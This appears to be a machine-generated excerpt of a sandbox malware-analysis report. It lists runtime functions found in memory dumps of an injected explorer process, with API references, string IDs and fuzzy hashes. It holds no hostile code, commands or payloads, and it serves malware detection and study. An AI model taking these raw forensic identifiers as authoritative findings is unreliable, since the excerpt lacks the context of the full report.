                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 331613561-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: ca7c8dd5e22a99662b57dcf49fa4c1f0c9ed2007ac2ca9c8d24d99271ffc7d5d
                                                                                                                                                                                                                                                    • Instruction ID: 98727bfa97f12414b9189527cbbffd59630cfe10a2cb7d854f5374d872b79c06
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca7c8dd5e22a99662b57dcf49fa4c1f0c9ed2007ac2ca9c8d24d99271ffc7d5d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C21077622468487DA30DF16E4807AEB760F389BA4F048316DF9A57B54CB3DE48ACF01
                                                                                                                                                                                                                                                    Function 0A042457 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0A042482
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0A04250C
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0A04245F
                                                                                                                                                                                                                                                      • Part of subcall function 0A0403AC: _getptd_noexit.LIBCMT ref: 0A0403B2
                                                                                                                                                                                                                                                      • Part of subcall function 0A0403AC: _amsg_exit.LIBCMT ref: 0A0403C2
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0A042511
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0A04251D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$DestructExceptionObject$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 331613561-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: ca7c8dd5e22a99662b57dcf49fa4c1f0c9ed2007ac2ca9c8d24d99271ffc7d5d
                                                                                                                                                                                                                                                    • Instruction ID: 836b3cf6e06d0989086c4e2e8c3228720cfd1fd977c7c3f2d92c5e87e5ab40a5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca7c8dd5e22a99662b57dcf49fa4c1f0c9ed2007ac2ca9c8d24d99271ffc7d5d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA2116B671468887D670DF16E4403AEB7A0F389BA5F058226DF9A07B55CB39E486CB01
                                                                                                                                                                                                                                                    Function 0E8C2457 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0E8C2482
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0E8C250C
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E8C245F
                                                                                                                                                                                                                                                      • Part of subcall function 0E8C03AC: _getptd_noexit.LIBCMT ref: 0E8C03B2
                                                                                                                                                                                                                                                      • Part of subcall function 0E8C03AC: _amsg_exit.LIBCMT ref: 0E8C03C2
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E8C2511
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E8C251D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$DestructExceptionObject$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 331613561-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: ca7c8dd5e22a99662b57dcf49fa4c1f0c9ed2007ac2ca9c8d24d99271ffc7d5d
                                                                                                                                                                                                                                                    • Instruction ID: 3d79b1f99ccd4f009d7d1584942477ffa4e7e3e6552060a91d64a95a36d6a233
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca7c8dd5e22a99662b57dcf49fa4c1f0c9ed2007ac2ca9c8d24d99271ffc7d5d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57215176214A84C7D730DF5AE45076E77A0F38ABA4F04861ACF9947BA4DF39D886CB01
                                                                                                                                                                                                                                                    Function 10D6C3E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 10D6C3F9
                                                                                                                                                                                                                                                      • Part of subcall function 10D6DCB0: std::_Lockit::_Lockit.LIBCPMT ref: 10D6DCC6
                                                                                                                                                                                                                                                      • Part of subcall function 10D6DCB0: std::_Lockit::~_Lockit.LIBCPMT ref: 10D6DCE9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 10D6C45E
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 10D6C468
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 10D6C48C
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D6C49D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                                                                    • API String ID: 3838066056-3145022300
                                                                                                                                                                                                                                                    • Opcode ID: 541dbdf570df0ccb3a37a589981444b59e1d2ced8f814644ad646456d655890b
                                                                                                                                                                                                                                                    • Instruction ID: aaf0389da6c04f3f66ee6983d440f385057920f21f65185ec9bd0827d9bb936c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 541dbdf570df0ccb3a37a589981444b59e1d2ced8f814644ad646456d655890b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C115875704B4582DE00DB66F450369A361F788BE8F888221FA9D47B98DFBCE546C740
                                                                                                                                                                                                                                                    Function 10D6C4B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 10D6C4C9
                                                                                                                                                                                                                                                      • Part of subcall function 10D6DCB0: std::_Lockit::_Lockit.LIBCPMT ref: 10D6DCC6
                                                                                                                                                                                                                                                      • Part of subcall function 10D6DCB0: std::_Lockit::~_Lockit.LIBCPMT ref: 10D6DCE9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 10D6C52E
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 10D6C538
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 10D6C55C
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D6C56D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                                                                    • API String ID: 3838066056-3145022300
                                                                                                                                                                                                                                                    • Opcode ID: eaea4c6d81cbe8905003b88ad41699f8a18f153314552f58afcfe7e6dd1a821a
                                                                                                                                                                                                                                                    • Instruction ID: 61d07804b65629ab5370f04f174a5271e99ac4e9288d03707307f4eb1a39f585
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaea4c6d81cbe8905003b88ad41699f8a18f153314552f58afcfe7e6dd1a821a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F115875704B4582DE00DB55F84135AA361F788BE8F888221EA9E47B98DF7CD546C740
                                                                                                                                                                                                                                                    Function 0F4AC4B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0F4AC4C9
                                                                                                                                                                                                                                                      • Part of subcall function 0F4ADCB0: std::_Lockit::_Lockit.LIBCPMT ref: 0F4ADCC6
                                                                                                                                                                                                                                                      • Part of subcall function 0F4ADCB0: std::_Lockit::~_Lockit.LIBCPMT ref: 0F4ADCE9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0F4AC52E
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0F4AC538
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0F4AC55C
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4AC56D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                                                                    • API String ID: 3838066056-3145022300
                                                                                                                                                                                                                                                    • Opcode ID: eaea4c6d81cbe8905003b88ad41699f8a18f153314552f58afcfe7e6dd1a821a
                                                                                                                                                                                                                                                    • Instruction ID: 9f1fa2b8bd27e96653e58966f79ee4912d54ff36fcf8d1e31c24195db9e1c8af
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaea4c6d81cbe8905003b88ad41699f8a18f153314552f58afcfe7e6dd1a821a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69118621704B4581DE10DB16F4503AAB361F7D8BE4F88422A9E6D47F9ADF7CC146C740
                                                                                                                                                                                                                                                    Function 0F4AC3E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0F4AC3F9
                                                                                                                                                                                                                                                      • Part of subcall function 0F4ADCB0: std::_Lockit::_Lockit.LIBCPMT ref: 0F4ADCC6
                                                                                                                                                                                                                                                      • Part of subcall function 0F4ADCB0: std::_Lockit::~_Lockit.LIBCPMT ref: 0F4ADCE9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0F4AC45E
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0F4AC468
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0F4AC48C
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4AC49D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                                                                    • API String ID: 3838066056-3145022300
                                                                                                                                                                                                                                                    • Opcode ID: 541dbdf570df0ccb3a37a589981444b59e1d2ced8f814644ad646456d655890b
                                                                                                                                                                                                                                                    • Instruction ID: a8287284e1c4aab00c62df8a8ecf888394976972fd9b96beaed5f63acd6b29aa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 541dbdf570df0ccb3a37a589981444b59e1d2ced8f814644ad646456d655890b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58115821704B8591DE14DB16E4903AA7361F7D4BE4F88422B9EAD47F9ADF7CC146C740
                                                                                                                                                                                                                                                    Function 0C35B7E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0C35B7F9
                                                                                                                                                                                                                                                      • Part of subcall function 0C35D0B0: std::_Lockit::_Lockit.LIBCPMT ref: 0C35D0C6
                                                                                                                                                                                                                                                      • Part of subcall function 0C35D0B0: std::_Lockit::~_Lockit.LIBCPMT ref: 0C35D0E9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0C35B85E
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0C35B868
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0C35B88C
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C35B89D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: le32Next
                                                                                                                                                                                                                                                    • API String ID: 3838066056-3888052004
                                                                                                                                                                                                                                                    • Opcode ID: 749449a22ef72b4327b6793e58f92429f308b4eecf308e11f9d084161f211034
                                                                                                                                                                                                                                                    • Instruction ID: 674569ee620d9388383d7a391be273906fbe6ed1b50ec2d0cb2741d565897b0b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 749449a22ef72b4327b6793e58f92429f308b4eecf308e11f9d084161f211034
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9119831324B4482DE14DB16F44079AA361F788BE8F588221EDAD07F68DF7CD249CB41
                                                                                                                                                                                                                                                    Function 0C35B8B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0C35B8C9
                                                                                                                                                                                                                                                      • Part of subcall function 0C35D0B0: std::_Lockit::_Lockit.LIBCPMT ref: 0C35D0C6
                                                                                                                                                                                                                                                      • Part of subcall function 0C35D0B0: std::_Lockit::~_Lockit.LIBCPMT ref: 0C35D0E9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0C35B92E
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0C35B938
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0C35B95C
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0C35B96D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: le32Next
                                                                                                                                                                                                                                                    • API String ID: 3838066056-3888052004
                                                                                                                                                                                                                                                    • Opcode ID: 3f2cfd346f00936d1d0ceca0f1e07b3d9d9985527677f1b629d1e8123c28af09
                                                                                                                                                                                                                                                    • Instruction ID: e73ad7ac11e8e8946608d73de5109f326b72a76633625c19321fc8a379caff08
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f2cfd346f00936d1d0ceca0f1e07b3d9d9985527677f1b629d1e8123c28af09
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76114271328B4481DE14DB16F45079EA361F788BE8F4882219AAD47B98DF7CD549CF41
                                                                                                                                                                                                                                                    Function 0E8FC4B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0E8FC4C9
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FDCB0: std::_Lockit::_Lockit.LIBCPMT ref: 0E8FDCC6
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FDCB0: std::_Lockit::~_Lockit.LIBCPMT ref: 0E8FDCE9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0E8FC52E
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0E8FC538
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0E8FC55C
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8FC56D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                                                                    • API String ID: 3838066056-3145022300
                                                                                                                                                                                                                                                    • Opcode ID: eaea4c6d81cbe8905003b88ad41699f8a18f153314552f58afcfe7e6dd1a821a
                                                                                                                                                                                                                                                    • Instruction ID: 272a77f944840aa33091e1d90d06309d9d83bd2cc955ecb318df03237efb42ee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaea4c6d81cbe8905003b88ad41699f8a18f153314552f58afcfe7e6dd1a821a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40118271604B8491DE10DB56F44035AA3A1F7C8BE4F884A21DB5D47BE8EF7CCA46C740
                                                                                                                                                                                                                                                    Function 0E8FC3E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0E8FC3F9
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FDCB0: std::_Lockit::_Lockit.LIBCPMT ref: 0E8FDCC6
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FDCB0: std::_Lockit::~_Lockit.LIBCPMT ref: 0E8FDCE9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0E8FC45E
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0E8FC468
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0E8FC48C
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8FC49D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                                                                    • API String ID: 3838066056-3145022300
                                                                                                                                                                                                                                                    • Opcode ID: 541dbdf570df0ccb3a37a589981444b59e1d2ced8f814644ad646456d655890b
                                                                                                                                                                                                                                                    • Instruction ID: 777e16c4b1d0d9eb024e2b823ba872e7d1f859de72dba2210fbe01ad54e9ff43
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 541dbdf570df0ccb3a37a589981444b59e1d2ced8f814644ad646456d655890b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1116061204B8591DE10DB26F55036AA3A0F7C8BE4F884621DAAD47BE8EF6CCA46C740
                                                                                                                                                                                                                                                    Function 0A02B8B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0A02B8C9
                                                                                                                                                                                                                                                      • Part of subcall function 0A02D0B0: std::_Lockit::_Lockit.LIBCPMT ref: 0A02D0C6
                                                                                                                                                                                                                                                      • Part of subcall function 0A02D0B0: std::_Lockit::~_Lockit.LIBCPMT ref: 0A02D0E9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0A02B92E
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0A02B938
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0A02B95C
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A02B96D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: le32Next
                                                                                                                                                                                                                                                    • API String ID: 3838066056-3888052004
                                                                                                                                                                                                                                                    • Opcode ID: 3f2cfd346f00936d1d0ceca0f1e07b3d9d9985527677f1b629d1e8123c28af09
                                                                                                                                                                                                                                                    • Instruction ID: 1fedd3683bb9827155117db8ac62003722b318af4e12770744d717ff091f238c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f2cfd346f00936d1d0ceca0f1e07b3d9d9985527677f1b629d1e8123c28af09
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3116032708B4992DE10EF26E45039EA365F789BE4F484225DA9D07BA9DF7CC105C740
                                                                                                                                                                                                                                                    Function 0A02B7E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0A02B7F9
                                                                                                                                                                                                                                                      • Part of subcall function 0A02D0B0: std::_Lockit::_Lockit.LIBCPMT ref: 0A02D0C6
                                                                                                                                                                                                                                                      • Part of subcall function 0A02D0B0: std::_Lockit::~_Lockit.LIBCPMT ref: 0A02D0E9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0A02B85E
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0A02B868
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0A02B88C
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0A02B89D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: le32Next
                                                                                                                                                                                                                                                    • API String ID: 3838066056-3888052004
                                                                                                                                                                                                                                                    • Opcode ID: 749449a22ef72b4327b6793e58f92429f308b4eecf308e11f9d084161f211034
                                                                                                                                                                                                                                                    • Instruction ID: f0f2cc6738196c16c83df2a8fbb0675d14c118f4b884935d9746454fcd18163d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 749449a22ef72b4327b6793e58f92429f308b4eecf308e11f9d084161f211034
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0116032704B4991EE10DF27E45039AA365F789BE4F884221DAAD07BA9DF6CC145CB41
                                                                                                                                                                                                                                                    Function 0E8AB7E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0E8AB7F9
                                                                                                                                                                                                                                                      • Part of subcall function 0E8AD0B0: std::_Lockit::_Lockit.LIBCPMT ref: 0E8AD0C6
                                                                                                                                                                                                                                                      • Part of subcall function 0E8AD0B0: std::_Lockit::~_Lockit.LIBCPMT ref: 0E8AD0E9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0E8AB85E
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0E8AB868
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0E8AB88C
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8AB89D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: le32Next
